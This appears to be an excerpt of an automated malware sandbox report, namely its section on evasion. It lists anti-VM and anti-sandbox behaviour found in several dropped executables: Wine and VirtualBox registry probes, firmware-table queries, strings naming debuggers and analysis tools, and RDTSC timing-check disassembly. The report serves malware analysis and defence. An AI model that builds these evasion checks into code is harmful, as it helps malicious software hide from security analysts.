                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Yara detected AntiVM3
                              Source: Yara matchFile source: Process Memory Space: fc1570cd0d.exe PID: 8160, type: MEMORYSTR
                              Checks if the current machine is a virtual machine (disk enumeration)
                              Source: C:\Windows\SysWOW64\svchost.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_3-11631
                              Query firmware table information (likely to detect VMs)
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeSystem information queried: FirmwareTableInformation
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeSystem information queried: FirmwareTableInformation
                              Switches to a custom stack to bypass stack traces
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                              Tries to detect sandboxes / dynamic malware analysis system (registry check)
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLT-FQ
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHA0
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                              Source: ae64e67a81.exe, 00000013.00000002.2386918111.0000000000E70000.00000004.00001000.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000002.2385396950.000000000009C000.00000004.00000001.01000000.00000018.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                              Source: ae64e67a81.exe, 00000013.00000002.2386918111.0000000000E70000.00000004.00001000.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000002.2385396950.000000000009C000.00000004.00000001.01000000.00000018.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLCUCKOOMON.DLL
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PY.EXELORDPE.EXEDNSPY.EXEPETOOLS.EXEAUTORUNSC.EXERESOURCEHACKER.EXEFILEMON.EXEREGMON.EXEWINDANR.EXE
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TORUNS.EXEDUMPCAP.EXEDE4
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDANR.EXE
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                              Tries to detect virtualization through RDTSC time measurements
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 71EC8C second address: 71ECCA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1C54A6E98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f jmp 00007FA1C54A6EA7h 0x00000014 pop ebx 0x00000015 pushad 0x00000016 jmp 00007FA1C54A6EA4h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8939FF second address: 893A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C45142A5h 0x00000009 popad 0x0000000a jmp 00007FA1C45142A4h 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 893A2D second address: 893A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FA1C54A6E96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 893A38 second address: 893A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C451429Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FA1C4514296h 0x00000014 jne 00007FA1C4514296h 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 88B04B second address: 88B08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C54A6EA6h 0x00000009 jns 00007FA1C54A6E96h 0x0000000f popad 0x00000010 jnp 00007FA1C54A6EAFh 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 88B08B second address: 88B097 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1C451429Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 892E6C second address: 892E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 892E70 second address: 892E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 893298 second address: 89329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 89329C second address: 8932B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FA1C45142A6h 0x0000000c jbe 00007FA1C4514296h 0x00000012 jmp 00007FA1C451429Ah 0x00000017 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 895A23 second address: 895A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 895A27 second address: 895A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 895C2F second address: 895CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1C54A6EA6h 0x00000008 jg 00007FA1C54A6E96h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop eax 0x00000012 mov dword ptr [ebp+122D2915h], ecx 0x00000018 push 00000003h 0x0000001a call 00007FA1C54A6EA0h 0x0000001f js 00007FA1C54A6E9Ch 0x00000025 or esi, 172E856Dh 0x0000002b pop esi 0x0000002c push 00000000h 0x0000002e mov di, CC7Ah 0x00000032 push 00000003h 0x00000034 mov edi, 649290C1h 0x00000039 push 9FED6D3Ah 0x0000003e pushad 0x0000003f push eax 0x00000040 jmp 00007FA1C54A6EA5h 0x00000045 pop eax 0x00000046 push ebx 0x00000047 push edi 0x00000048 pop edi 0x00000049 pop ebx 0x0000004a popad 0x0000004b xor dword ptr [esp], 5FED6D3Ah 0x00000052 lea ebx, dword ptr [ebp+1244A91Ch] 0x00000058 mov dword ptr [ebp+122D266Ah], ecx 0x0000005e xchg eax, ebx 0x0000005f pushad 0x00000060 je 00007FA1C54A6E98h 0x00000066 push esi 0x00000067 pop esi 0x00000068 jnl 00007FA1C54A6E9Ch 0x0000006e je 00007FA1C54A6E96h 0x00000074 popad 0x00000075 push eax 0x00000076 pushad 0x00000077 jnp 00007FA1C54A6E9Ch 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B6C4F second address: 8B6C68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Ch 0x00000007 jbe 00007FA1C4514296h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B6C68 second address: 8B6CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA1C54A6E96h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007FA1C54A6E9Dh 0x00000014 jne 00007FA1C54A6E9Ch 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d jne 00007FA1C54A6E96h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA1C54A6EA2h 0x0000002b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 87A632 second address: 87A636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 87A636 second address: 87A65C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1C54A6E96h 0x00000008 jmp 00007FA1C54A6EA8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4AA4 second address: 8B4AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4AA8 second address: 8B4AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4AAE second address: 8B4AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4AB4 second address: 8B4ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA1C54A6E96h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4BC0 second address: 8B4BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4BC4 second address: 8B4BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FA1C54A6EA9h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4BFA second address: 8B4BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4BFF second address: 8B4C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4C05 second address: 8B4C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4C0B second address: 8B4C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4DAD second address: 8B4DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4DB1 second address: 8B4DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4F22 second address: 8B4F53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1C45142A8h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B4F53 second address: 8B4F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B50B0 second address: 8B50CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA1C45142A4h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B5204 second address: 8B520B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B54A9 second address: 8B54B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA1C4514296h 0x0000000a pop edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B54B4 second address: 8B54CF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1C54A6E98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007FA1C54A6EA2h 0x00000013 ja 00007FA1C54A6E96h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B54CF second address: 8B54F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C45142A5h 0x00000009 pushad 0x0000000a jns 00007FA1C4514296h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B58CE second address: 8B5903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA1C54A6EA8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B5903 second address: 8B5907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B5AA4 second address: 8B5AD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Ch 0x00000007 jo 00007FA1C54A6EA7h 0x0000000d ja 00007FA1C54A6E96h 0x00000013 jmp 00007FA1C54A6E9Bh 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push edx 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push edi 0x00000024 pop edi 0x00000025 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B5AD6 second address: 8B5AE8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1C4514296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FA1C45142AFh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8ADAEA second address: 8ADAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8B6ABD second address: 8B6AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 88E5A1 second address: 88E5DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007FA1C54A6E96h 0x00000010 pop eax 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FA1C54A6EA8h 0x0000001c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C5286 second address: 8C528C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C528C second address: 8C529F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FA1C54A6E96h 0x0000000d jnp 00007FA1C54A6E96h 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C529F second address: 8C52B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C52B5 second address: 8C52BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C5430 second address: 8C543E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FA1C4514296h 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C543E second address: 8C5444 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C5444 second address: 8C545E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA1C45142A0h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C545E second address: 8C546C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C546C second address: 8C5472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C5472 second address: 8C5476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
